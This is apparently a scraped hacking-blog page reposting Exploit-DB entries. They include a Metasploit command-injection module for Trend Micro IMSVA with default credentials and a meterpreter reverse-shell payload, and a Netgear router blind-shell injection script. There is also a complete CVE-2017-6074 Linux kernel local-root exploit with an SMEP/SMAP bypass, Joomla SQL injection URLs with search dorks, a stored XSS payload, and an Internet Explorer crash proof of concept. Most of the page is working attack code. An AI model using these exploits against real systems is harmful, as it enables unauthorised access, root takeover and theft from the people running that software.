##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution',
'Description' => %q{
This module exploits a command injection vulnerability in the Trend Micro
IMSVA product. An authenticated user can execute a terminal command under
the context of the web server user which is root. Besides, default installation
of IMSVA comes with a default administrator credentials.
saveCert.imss endpoint takes several user inputs and performs blacklisting.
After that it use them as argument of predefined operating system command
without proper sanitation. However,due to improper blacklisting rule it's possible to inject
arbitrary commands into it. InterScan Messaging Security prior to 9.1.-1600 affected by this issue.
This module was tested against IMSVA 9.1-1600.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Mehmet Ince <mehmet@mehmetince.net>' # discovery & msf module
],
'References' =>
[
['URL', 'https://pentest.blog/advisory-trend-micro-interscan-messaging-security-virtual-appliance-remote-code-execution/']
],
'Privileged' => true,
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
'BadChars' => "\x2f\x22"
},
'DefaultOptions' =>
{
'SSL' => true,
'payload' => 'python/meterpreter/reverse_tcp',
},
'Platform' => ['python'],
'Arch' => ARCH_PYTHON,
'Targets' => [ ['Automatic', {}] ],
'DisclosureDate' => 'Jan 15 2017',
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'The target URI of the Trend Micro IMSVA', '/']),
OptString.new('USERNAME', [ true, 'The username for authentication', 'admin' ]),
OptString.new('PASSWORD', [ true, 'The password for authentication', 'imsva' ]),
Opt::RPORT(8445)
]
)
end
def login
user = datastore['USERNAME']
pass = datastore['PASSWORD']
print_status("Attempting to login with #{user}:#{pass}")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'login.imss'),
'vars_post' => {
'userid' => user,
'pwdfake' => Rex::Text::encode_base64(pass)
}
})
if res && res.body.include?("The user name or password you entered is invalid")
fail_with(Failure::NoAccess, "#{peer} - Login with #{user}:#{pass} failed...")
end
cookie = res.get_cookies
if res.code == 302 && cookie.include?("JSESSIONID")
jsessionid = cookie.scan(/JSESSIONID=(\w+);/).flatten.first
print_good("Authenticated as #{user}:#{pass}")
return jsessionid
end
nil
end
def exploit
jsessionid = login
unless jsessionid
fail_with(Failure::Unknown, 'Unable to obtain the cookie session ID')
end
# Somehow java stores last visited url on session like viewstate!
# Visit form before submitting it. Otherwise, it will cause a crash.
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'initCert.imss'),
'cookie' => "JSESSIONID=#{jsessionid}"
})
if !res or !res.body.include?("Transport Layer Security")
fail_with(Failure::Unknown, 'Unable to visit initCert.imss')
end
# Random string that will be used as a cert name, state, email etc.
r = Rex::Text::rand_text_alphanumeric(5)
print_status("Delivering payload...")
# Since double quote are blacklisted, we are using Single, Backslash, Single, Single on our payload. Thanks to @wvu !!!
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'saveCert.imss'),
'cookie' => "JSESSIONID=#{jsessionid}",
'vars_get' => {
'mode' => 0
},
'vars_post' => {
'certName' => r,
'certType' => 0,
'keyLength' => 2048,
'countryCode' => 'TR',
'state' => r,
'locality' => r,
'org' => r,
'orgUnit' => r,
'commonName' => "#{r}';python -c '#{payload.encoded.gsub("'", "'\\\\''")}' #",
'emailAddress' => "#{r}@mail.com",
'validDays' => '',
'id' => '',
}
})
end
end
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863584679
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# # # # #
# Exploit Title: Joomla! Component Gnosis v1.1.2 - SQL Injection
# Google Dork: inurl:index.php?option=com_gnosis
# Date: 25.02.2017
# Vendor Homepage: http://hypermodern.org/
# Software : https://extensions.joomla.org/extensions/extension/directory-a-documentation/glossary/gnosis/
# Demo: http://gnosis.hypermodern.org/index.php/dictionary
# Version: 1.1.2
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_gnosis&view=tags&id=[SQL]
# # # # #
#!/usr/bin/python
#Provides access to default user account, privileges can be easily elevated by using either:
# - a kernel exploit (ex. memodipper was tested and it worked)
# - by executing /bin/bd (suid backdoor present on SOME but not all versions)
# - by manipulating the httpd config files to trick the root user into executing your code (separate advisory will be released soon)
#Pozdrawiam: Kornela, Komara i Sknerusa
import sys
import requests
#You can change these credentials to ex. Gearguy/Geardog or Guest/Guest which are hardcoded on SOME firmware versions
#These routers DO NOT support telnet/ssh access so you can use this exploit to access the shell if you want to
login = 'admin'
password = 'password'
def main():
if len(sys.argv) < 2:
print "./netgearpwn_2.py <router ip>"
return
spawnShell()
def execute(cmd): #Escaping basic sanitization
requests.post("http://" + sys.argv[1] + "/dnslookup.cgi", data={'host_name':"www.google.com; " + cmd, 'lookup': "Lookup"}, auth=(login, password))
return
def spawnShell():
print "Dropping a shell-like environment (blind OS injection)"
print "To test it type 'reboot'"
while True:
cmd = raw_input("[blind $] ")
execute(cmd)
if __name__ == "__main__":
main()
#2017-02-25 by SivertPL
#Tak, to ja.
//
// EDB Note: More information ~ http://seclists.org/oss-sec/2017/q1/471
//
// A proof-of-concept local root exploit for CVE-2017-6074.
// Includes a semireliable SMAP/SMEP bypass.
// Tested on 4.4.0-62-generic #83-Ubuntu kernel.
// https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-6074
//
// Usage:
// $ gcc poc.c -o pwn
// $ ./pwn
// [.] namespace sandbox setup successfully
// [.] disabling SMEP & SMAP
// [.] scheduling 0xffffffff81064550(0x406e0)
// [.] waiting for the timer to execute
// [.] done
// [.] SMEP & SMAP should be off now
// [.] getting root
// [.] executing 0x402043
// [.] done
// [.] should be root now
// [.] checking if we got root
// [+] got r00t ^_^
// [!] don't kill the exploit binary, the kernel will crash
// # cat /etc/shadow
// ...
// daemon:*:17149:0:99999:7:::
// bin:*:17149:0:99999:7:::
// sys:*:17149:0:99999:7:::
// sync:*:17149:0:99999:7:::
// games:*:17149:0:99999:7:::
// ...
//
// Andrey Konovalov <andreyknvl@gmail.com>
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sched.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <arpa/inet.h>
#include <linux/if_packet.h>
#include <netinet/if_ether.h>
#define SMEP_SMAP_BYPASS 1
// Needed for local root.
#define COMMIT_CREDS 0xffffffff810a2840L
#define PREPARE_KERNEL_CRED 0xffffffff810a2c30L
#define SHINFO_OFFSET 1728
// Needed for SMEP_SMAP_BYPASS.
#define NATIVE_WRITE_CR4 0xffffffff81064550ul
#define CR4_DESIRED_VALUE 0x406e0ul
#define TIMER_OFFSET (728 + 48 + 104)
#define KMALLOC_PAD 128
#define KMALLOC_WARM 32
#define CATCH_FIRST 6
#define CATCH_AGAIN 16
#define CATCH_AGAIN_SMALL 64
// Port is incremented on each use.
static int port = 11000;
void debug(const char *msg) {
/*
char buffer[32];
snprintf(&buffer[0], sizeof(buffer), "echo '%s' > /dev/kmsg\n", msg);
system(buffer);
*/
}
// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *
struct ubuf_info {
uint64_t callback; // void (*callback)(struct ubuf_info *, bool)
uint64_t ctx; // void *
uint64_t desc; // unsigned long
};
struct skb_shared_info {
uint8_t nr_frags; // unsigned char
uint8_t tx_flags; // __u8
uint16_t gso_size; // unsigned short
uint16_t gso_segs; // unsigned short
uint16_t gso_type; // unsigned short
uint64_t frag_list; // struct sk_buff *
uint64_t hwtstamps; // struct skb_shared_hwtstamps
uint32_t tskey; // u32
uint32_t ip6_frag_id; // __be32
uint32_t dataref; // atomic_t
uint64_t destructor_arg; // void *
uint8_t frags[16][17]; // skb_frag_t frags[MAX_SKB_FRAGS];
};
struct ubuf_info ui;
void init_skb_buffer(char* buffer, void *func) {
memset(&buffer[0], 0, 2048);
struct skb_shared_info *ssi = (struct skb_shared_info *)&buffer[SHINFO_OFFSET];
ssi->tx_flags = 0xff;
ssi->destructor_arg = (uint64_t)&ui;
ssi->nr_frags = 0;
ssi->frag_list = 0;
ui.callback = (unsigned long)func;
}
struct timer_list {
void *next;
void *prev;
unsigned long expires;
void (*function)(unsigned long);
unsigned long data;
unsigned int flags;
int slack;
};
void init_timer_buffer(char* buffer, void *func, unsigned long arg) {
memset(&buffer[0], 0, 2048);
struct timer_list* timer = (struct timer_list *)&buffer[TIMER_OFFSET];
timer->next = 0;
timer->prev = 0;
timer->expires = 4294943360;
timer->function = func;
timer->data = arg;
timer->flags = 1;
timer->slack = -1;
}
// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *
struct dccp_handle {
struct sockaddr_in6 sa;
int s1;
int s2;
};
void dccp_init(struct dccp_handle *handle, int port) {
handle->sa.sin6_family = AF_INET6;
handle->sa.sin6_port = htons(port);
inet_pton(AF_INET6, "::1", &handle->sa.sin6_addr);
handle->sa.sin6_flowinfo = 0;
handle->sa.sin6_scope_id = 0;
handle->s1 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);
if (handle->s1 == -1) {
perror("socket(SOCK_DCCP)");
exit(EXIT_FAILURE);
}
int rv = bind(handle->s1, &handle->sa, sizeof(handle->sa));
if (rv != 0) {
perror("bind()");
exit(EXIT_FAILURE);
}
rv = listen(handle->s1, 0x9);
if (rv != 0) {
perror("listen()");
exit(EXIT_FAILURE);
}
int optval = 8;
rv = setsockopt(handle->s1, IPPROTO_IPV6, IPV6_RECVPKTINFO,
&optval, sizeof(optval));
if (rv != 0) {
perror("setsockopt(IPV6_RECVPKTINFO)");
exit(EXIT_FAILURE);
}
handle->s2 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);
if (handle->s1 == -1) {
perror("socket(SOCK_DCCP)");
exit(EXIT_FAILURE);
}
}
void dccp_kmalloc_kfree(struct dccp_handle *handle) {
int rv = connect(handle->s2, &handle->sa, sizeof(handle->sa));
if (rv != 0) {
perror("connect(SOCK_DCCP)");
exit(EXIT_FAILURE);
}
}
void dccp_kfree_again(struct dccp_handle *handle) {
int rv = shutdown(handle->s1, SHUT_RDWR);
if (rv != 0) {
perror("shutdown(SOCK_DCCP)");
exit(EXIT_FAILURE);
}
}
void dccp_destroy(struct dccp_handle *handle) {
close(handle->s1);
close(handle->s2);
}
// * * * * * * * * * * * * * * Heap spraying * * * * * * * * * * * * * * * * *
struct udp_fifo_handle {
int fds[2];
};
void udp_fifo_init(struct udp_fifo_handle* handle) {
int rv = socketpair(AF_LOCAL, SOCK_DGRAM, 0, handle->fds);
if (rv != 0) {
perror("socketpair()");
exit(EXIT_FAILURE);
}
}
void udp_fifo_destroy(struct udp_fifo_handle* handle) {
close(handle->fds[0]);
close(handle->fds[1]);
}
void udp_fifo_kmalloc(struct udp_fifo_handle* handle, char *buffer) {
int rv = send(handle->fds[0], buffer, 1536, 0);
if (rv != 1536) {
perror("send()");
exit(EXIT_FAILURE);
}
}
void udp_fifo_kmalloc_small(struct udp_fifo_handle* handle) {
char buffer[128];
int rv = send(handle->fds[0], &buffer[0], 128, 0);
if (rv != 128) {
perror("send()");
exit(EXIT_FAILURE);
}
}
void udp_fifo_kfree(struct udp_fifo_handle* handle) {
char buffer[2048];
int rv = recv(handle->fds[1], &buffer[0], 1536, 0);
if (rv != 1536) {
perror("recv()");
exit(EXIT_FAILURE);
}
}
int timer_kmalloc() {
int s = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));
if (s == -1) {
perror("socket(SOCK_DGRAM)");
exit(EXIT_FAILURE);
}
return s;
}
#define CONF_RING_FRAMES 1
void timer_schedule(int handle, int timeout) {
int optval = TPACKET_V3;
int rv = setsockopt(handle, SOL_PACKET, PACKET_VERSION,
&optval, sizeof(optval));
if (rv != 0) {
perror("setsockopt(PACKET_VERSION)");
exit(EXIT_FAILURE);
}
struct tpacket_req3 tp;
memset(&tp, 0, sizeof(tp));
tp.tp_block_size = CONF_RING_FRAMES * getpagesize();
tp.tp_block_nr = 1;
tp.tp_frame_size = getpagesize();
tp.tp_frame_nr = CONF_RING_FRAMES;
tp.tp_retire_blk_tov = timeout;
rv = setsockopt(handle, SOL_PACKET, PACKET_RX_RING,
(void *)&tp, sizeof(tp));
if (rv != 0) {
perror("setsockopt(PACKET_RX_RING)");
exit(EXIT_FAILURE);
}
}
void socket_sendmmsg(int sock, char *buffer) {
struct mmsghdr msg[1];
msg[0].msg_hdr.msg_iovlen = 0;
// Buffer to kmalloc.
msg[0].msg_hdr.msg_control = &buffer[0];
msg[0].msg_hdr.msg_controllen = 2048;
// Make sendmmsg exit easy with EINVAL.
msg[0].msg_hdr.msg_name = "root";
msg[0].msg_hdr.msg_namelen = 1;
int rv = syscall(__NR_sendmmsg, sock, msg, 1, 0);
if (rv == -1 && errno != EINVAL) {
perror("[-] sendmmsg()");
exit(EXIT_FAILURE);
}
}
void sendmmsg_kmalloc_kfree(int port, char *buffer) {
int sock[2];
int rv = socketpair(AF_LOCAL, SOCK_DGRAM, 0, sock);
if (rv != 0) {
perror("socketpair()");
exit(EXIT_FAILURE);
}
socket_sendmmsg(sock[0], buffer);
close(sock[0]);
}
// * * * * * * * * * * * * * * Heap warming * * * * * * * * * * * * * * * * *
void dccp_connect_pad(struct dccp_handle *handle, int port) {
handle->sa.sin6_family = AF_INET6;
handle->sa.sin6_port = htons(port);
inet_pton(AF_INET6, "::1", &handle->sa.sin6_addr);
handle->sa.sin6_flowinfo = 0;
handle->sa.sin6_scope_id = 0;
handle->s1 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);
if (handle->s1 == -1) {
perror("socket(SOCK_DCCP)");
exit(EXIT_FAILURE);
}
int rv = bind(handle->s1, &handle->sa, sizeof(handle->sa));
if (rv != 0) {
perror("bind()");
exit(EXIT_FAILURE);
}
rv = listen(handle->s1, 0x9);
if (rv != 0) {
perror("listen()");
exit(EXIT_FAILURE);
}
handle->s2 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);
if (handle->s1 == -1) {
perror("socket(SOCK_DCCP)");
exit(EXIT_FAILURE);
}
rv = connect(handle->s2, &handle->sa, sizeof(handle->sa));
if (rv != 0) {
perror("connect(SOCK_DCCP)");
exit(EXIT_FAILURE);
}
}
void dccp_kmalloc_pad() {
int i;
struct dccp_handle handle;
for (i = 0; i < 4; i++) {
dccp_connect_pad(&handle, port++);
}
}
void timer_kmalloc_pad() {
int i;
for (i = 0; i < 4; i++) {
socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));
}
}
void udp_kmalloc_pad() {
int i, j;
char dummy[2048];
struct udp_fifo_handle uh[16];
for (i = 0; i < KMALLOC_PAD / 16; i++) {
udp_fifo_init(&uh[i]);
for (j = 0; j < 16; j++)
udp_fifo_kmalloc(&uh[i], &dummy[0]);
}
}
void kmalloc_pad() {
debug("dccp kmalloc pad");
dccp_kmalloc_pad();
debug("timer kmalloc pad");
timer_kmalloc_pad();
debug("udp kmalloc pad");
udp_kmalloc_pad();
}
void udp_kmalloc_warm() {
int i, j;
char dummy[2048];
struct udp_fifo_handle uh[16];
for (i = 0; i < KMALLOC_WARM / 16; i++) {
udp_fifo_init(&uh[i]);
for (j = 0; j < 16; j++)
udp_fifo_kmalloc(&uh[i], &dummy[0]);
}
for (i = 0; i < KMALLOC_WARM / 16; i++) {
for (j = 0; j < 16; j++)
udp_fifo_kfree(&uh[i]);
}
}
void kmalloc_warm() {
udp_kmalloc_warm();
}
// * * * * * * * * * * * * * Disabling SMEP/SMAP * * * * * * * * * * * * * * *
// Executes func(arg) from interrupt context multiple times.
void kernel_exec_irq(void *func, unsigned long arg) {
int i;
struct dccp_handle dh;
struct udp_fifo_handle uh1, uh2, uh3, uh4;
char dummy[2048];
char buffer[2048];
printf("[.] scheduling %p(%p)\n", func, (void *)arg);
memset(&dummy[0], 0xc3, 2048);
init_timer_buffer(&buffer[0], func, arg);
udp_fifo_init(&uh1);
udp_fifo_init(&uh2);
udp_fifo_init(&uh3);
udp_fifo_init(&uh4);
debug("kmalloc pad");
kmalloc_pad();
debug("kmalloc warm");
kmalloc_warm();
debug("dccp init");
dccp_init(&dh, port++);
debug("dccp kmalloc kfree");
dccp_kmalloc_kfree(&dh);
debug("catch 1");
for (i = 0; i < CATCH_FIRST; i++)
udp_fifo_kmalloc(&uh1, &dummy[0]);
debug("dccp kfree again");
dccp_kfree_again(&dh);
debug("catch 2");
for (i = 0; i < CATCH_FIRST; i++)
udp_fifo_kmalloc(&uh2, &dummy[0]);
int timers[CATCH_FIRST];
debug("catch 1 -> timer");
for (i = 0; i < CATCH_FIRST; i++) {
udp_fifo_kfree(&uh1);
timers[i] = timer_kmalloc();
}
debug("catch 1 small");
for (i = 0; i < CATCH_AGAIN_SMALL; i++)
udp_fifo_kmalloc_small(&uh4);
debug("schedule timers");
for (i = 0; i < CATCH_FIRST; i++)
timer_schedule(timers[i], 500);
debug("catch 2 -> overwrite timers");
for (i = 0; i < CATCH_FIRST; i++) {
udp_fifo_kfree(&uh2);
udp_fifo_kmalloc(&uh3, &buffer[0]);
}
debug("catch 2 small");
for (i = 0; i < CATCH_AGAIN_SMALL; i++)
udp_fifo_kmalloc_small(&uh4);
printf("[.] waiting for the timer to execute\n");
debug("wait");
sleep(1);
printf("[.] done\n");
}
void disable_smep_smap() {
printf("[.] disabling SMEP & SMAP\n");
kernel_exec_irq((void *)NATIVE_WRITE_CR4, CR4_DESIRED_VALUE);
printf("[.] SMEP & SMAP should be off now\n");
}
// * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * * *
// Executes func() from process context.
void kernel_exec(void *func) {
int i;
struct dccp_handle dh;
struct udp_fifo_handle uh1, uh2, uh3;
char dummy[2048];
char buffer[2048];
printf("[.] executing %p\n", func);
memset(&dummy[0], 0, 2048);
init_skb_buffer(&buffer[0], func);
udp_fifo_init(&uh1);
udp_fifo_init(&uh2);
udp_fifo_init(&uh3);
debug("kmalloc pad");
kmalloc_pad();
debug("kmalloc warm");
kmalloc_warm();
debug("dccp init");
dccp_init(&dh, port++);
debug("dccp kmalloc kfree");
dccp_kmalloc_kfree(&dh);
debug("catch 1");
for (i = 0; i < CATCH_FIRST; i++)
udp_fifo_kmalloc(&uh1, &dummy[0]);
debug("dccp kfree again:");
dccp_kfree_again(&dh);
debug("catch 2");
for (i = 0; i < CATCH_FIRST; i++)
udp_fifo_kmalloc(&uh2, &dummy[0]);
debug("catch 1 -> overwrite");
for (i = 0; i < CATCH_FIRST; i++) {
udp_fifo_kfree(&uh1);
sendmmsg_kmalloc_kfree(port++, &buffer[0]);
}
debug("catch 2 -> free & trigger");
for (i = 0; i < CATCH_FIRST; i++)
udp_fifo_kfree(&uh2);
debug("catch 1 & 2");
for (i = 0; i < CATCH_AGAIN; i++)
udp_fifo_kmalloc(&uh3, &dummy[0]);
printf("[.] done\n");
}
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds = (_commit_creds)COMMIT_CREDS;
_prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED;
void get_root_payload(void) {
commit_creds(prepare_kernel_cred(0));
}
void get_root() {
printf("[.] getting root\n");
kernel_exec(&get_root_payload);
printf("[.] should be root now\n");
}
// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *
void exec_shell() {
char *shell = "/bin/bash";
char *args[] = {shell, "-i", NULL};
execve(shell, args, NULL);
}
void fork_shell() {
pid_t rv;
rv = fork();
if (rv == -1) {
perror("fork()");
exit(EXIT_FAILURE);
}
if (rv == 0) {
exec_shell();
}
}
bool is_root() {
// We can't simple check uid, since we're running inside a namespace
// with uid set to 0. Try opening /etc/shadow instead.
int fd = open("/etc/shadow", O_RDONLY);
if (fd == -1)
return false;
close(fd);
return true;
}
void check_root() {
printf("[.] checking if we got root\n");
if (!is_root()) {
printf("[-] something went wrong =(\n");
printf("[!] don't kill the exploit binary, the kernel will crash\n");
return;
}
printf("[+] got r00t ^_^\n");
printf("[!] don't kill the exploit binary, the kernel will crash\n");
// Fork and exec instead of just doing the exec to avoid freeing
// skbuffs and prevent crashes due to a allocator corruption.
fork_shell();
}
static bool write_file(const char* file, const char* what, ...)
{
char buf[1024];
va_list args;
va_start(args, what);
vsnprintf(buf, sizeof(buf), what, args);
va_end(args);
buf[sizeof(buf) - 1] = 0;
int len = strlen(buf);
int fd = open(file, O_WRONLY | O_CLOEXEC);
if (fd == -1)
return false;
if (write(fd, buf, len) != len) {
close(fd);
return false;
}
close(fd);
return true;
}
void setup_sandbox() {
int real_uid = getuid();
int real_gid = getgid();
if (unshare(CLONE_NEWUSER) != 0) {
perror("unshare(CLONE_NEWUSER)");
exit(EXIT_FAILURE);
}
if (unshare(CLONE_NEWNET) != 0) {
perror("unshare(CLONE_NEWUSER)");
exit(EXIT_FAILURE);
}
if (!write_file("/proc/self/setgroups", "deny")) {
perror("write_file(/proc/self/set_groups)");
exit(EXIT_FAILURE);
}
if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid)){
perror("write_file(/proc/self/uid_map)");
exit(EXIT_FAILURE);
}
if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid)) {
perror("write_file(/proc/self/gid_map)");
exit(EXIT_FAILURE);
}
cpu_set_t my_set;
CPU_ZERO(&my_set);
CPU_SET(0, &my_set);
if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {
perror("sched_setaffinity()");
exit(EXIT_FAILURE);
}
if (system("/sbin/ifconfig lo up") != 0) {
perror("system(/sbin/ifconfig lo up)");
exit(EXIT_FAILURE);
}
printf("[.] namespace sandbox setup successfully\n");
}
int main() {
setup_sandbox();
#if SMEP_SMAP_BYPASS
disable_smep_smap();
#endif
get_root();
check_root();
while (true) {
sleep(100);
}
return 0;
}
# # # # #
# Exploit Title: Joomla! Component Intranet Attendance Track v2.6.5 - SQL Injection
# Google Dork: inurl:index.php?option=com_intranet
# Date: 25.02.2017
# Vendor Homepage: http://thagatpam.in/
# Software Buy: https://extensions.joomla.org/extensions/extension/clients-a-communities/communities/intranet-attendance-track/
# Demo: http://demo4.thagatpam.in/
# Version: 2.6.5
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/index.php?option=com_intranet&view=calendar&month=3&year=[SQL]
# http://localhost/[PATH]/index.php?option=com_intranet&view=calendar&month=[SQL]
# http://localhost/[PATH]/index.php?option=com_intranet&view=weeklyattendance&layout=weeklypdf&userid=940&weekstartdate=2017-02-20&weekuptodate=[SQL]
# http://localhost/[PATH]/index.php?option=com_intranet&view=weeklyattendance&layout=weeklypdf&userid=940&weekstartdate=[SQL]
# http://localhost/[PATH]/index.php?option=com_intranet&view=payslip&layout=mypayslip&user=940&month=8&year=[SQL]
# http://localhost/[PATH]/index.php?option=com_intranet&view=payslip&layout=mypayslip&user=940&month=[SQL]
# http://localhost/[PATH]/index.php?option=com_intranet&controller=promociones&task=landing&idPromocion=[SQL]
# http://localhost/[PATH]/index.php?option=com_intranet&controller=reservas&task=paso1&tipoIdaVuelta=1&rutaSalida=20&rutaDestino=[SQL]
# http://localhost/[PATH]/index.php?option=com_intranet&controller=reservas&task=paso1&tipoIdaVuelta=1&rutaSalida=[SQL]
# Etc..
# # # # #
//
// EDB Note: More information ~ http://seclists.org/oss-sec/2017/q1/471
//
// A trigger for CVE-2017-6074, crashes kernel.
// Tested on 4.4.0-62-generic #83-Ubuntu kernel.
// https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-6074
//
// Andrey Konovalov <andreyknvl@gmail.com>
#define _GNU_SOURCE
#include <netinet/ip.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
int main() {
struct sockaddr_in6 sa1;
sa1.sin6_family = AF_INET6;
sa1.sin6_port = htons(20002);
inet_pton(AF_INET6, "::1", &sa1.sin6_addr);
sa1.sin6_flowinfo = 0;
sa1.sin6_scope_id = 0;
int optval = 8;
int s1 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);
bind(s1, &sa1, 0x20);
listen(s1, 0x9);
setsockopt(s1, IPPROTO_IPV6, IPV6_RECVPKTINFO, &optval, 4);
int s2 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);
connect(s2, &sa1, 0x20);
shutdown(s1, SHUT_RDWR);
close(s1);
shutdown(s2, SHUT_RDWR);
close(s2);
return 0;
}
# Exploit Title: memcache-viewer - Stored XSS
# Date: 2017-02-24
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/chrisjameskirkham/memcache-viewer
# Software Link: https://github.com/chrisjameskirkham/memcache-viewer/archive/master.zip
# Version: Latest commit
# Tested on: Debian [wheezy]
### Vulnerability
This program does not filter filtering on the special character when expressing the data from memcached on the web.
When XSS attacks and HTML code are inserted in the memcached, user who accesses the page will run the XSS code.
### Example Attack code
1. Send Payload(XSS Code) after Connecting to memcached server.
#> telnet 127.0.0.1 11211
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
add hacked<script>alert(45)</script> 0 900 2
45
STORED
2. Insert data through memcached related 3rd party application.
### Result
Access index.php after memcache-viewer login
DOM Area in index.php
<td class="key">hacked<script>alert(45)</script></td><td class="slab">2</td><td class="size">2</td>
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1011
PoC:
-->
<!-- saved from url=(0014)about:internet -->
<style>
.class1 { float: left; column-count: 5; }
.class2 { column-span: all; columns: 1px; }
table {border-spacing: 0px;}
</style>
<script>
function boom() {
document.styleSheets[0].media.mediaText = "aaaaaaaaaaaaaaaaaaaa";
th1.align = "right";
}
</script>
<body onload="setInterval(boom,100)">
<table cellspacing="0">
<tr class="class1">
<th id="th1" colspan="5" width=0></th>
<th class="class2" width=0><div class="class2"></div></th>
<!--
Note: The analysis below is based on an 64-bit IE (running in single process mode) running on Windows Server 2012 R2. Microsoft Symbol Server has been down for several days and that's the only configuration for which I had up-to-date symbols. However Microsoft Edge and 32-bit IE 11 should behave similarly.
The PoC crashes in
MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement
when reading from address 0000007800000070
(5fc.8a4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0xa4:
00007ffe`8f330a59 48833800 cmp qword ptr [rax],0 ds:00000078`00000070=????????????????
With the following call stack:
Child-SP RetAddr Call Site
00000071`0e75b960 00007ffe`8f3f1836 MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0xa4
00000071`0e75b9c0 00007ffe`8e9ba9df MSHTML!`CBackgroundInfo::Property<CBackgroundImage>'::`7'::`dynamic atexit destructor for 'fieldDefaultValue''+0x641fc
00000071`0e75ba50 00007ffe`8f05393f MSHTML!Layout::FlowBoxBuilder::MoveToNextPosition+0x1b5
00000071`0e75bb10 00007ffe`8f0537e9 MSHTML!Layout::LayoutBuilder::EnterBlock+0x147
00000071`0e75bbb0 00007ffe`8f278243 MSHTML!Layout::LayoutBuilder::Move+0x77
00000071`0e75bbe0 00007ffe`8e9b364f MSHTML!Layout::LayoutBuilderDriver::BuildPageLayout+0x19d
00000071`0e75bcc0 00007ffe`8e9b239c MSHTML!Layout::PageCollection::FormatPage+0x1f3
00000071`0e75be60 00007ffe`8e9affd1 MSHTML!Layout::PageCollection::LayoutPagesCore+0x38c
00000071`0e75c030 00007ffe`8e9b099b MSHTML!Layout::PageCollection::LayoutPages+0x102
00000071`0e75c090 00007ffe`8e9aff45 MSHTML!CMarkupPageLayout::CalcPageLayoutSize+0x50b
00000071`0e75c220 00007ffe`8ea74047 MSHTML!CMarkupPageLayout::CalcTopLayoutSize+0xd5
00000071`0e75c2f0 00007ffe`8ea73c95 MSHTML!CMarkupPageLayout::DoLayout+0xf7
00000071`0e75c360 00007ffe`8e98066d MSHTML!CView::ExecuteLayoutTasks+0x17c
00000071`0e75c3f0 00007ffe`8e983b7a MSHTML!CView::EnsureView+0x43f
00000071`0e75c4d0 00007ffe`8e97f82b MSHTML!CPaintController::EnsureView+0x58
00000071`0e75c500 00007ffe`8ea2e47e MSHTML!CPaintBeat::OnBeat+0x41b
00000071`0e75c580 00007ffe`8ea2e414 MSHTML!CPaintBeat::OnPaintTimer+0x5a
00000071`0e75c5b0 00007ffe`8f2765dc MSHTML!CContainedTimerSink<CPaintBeat>::OnTimerMethodCall+0xdb
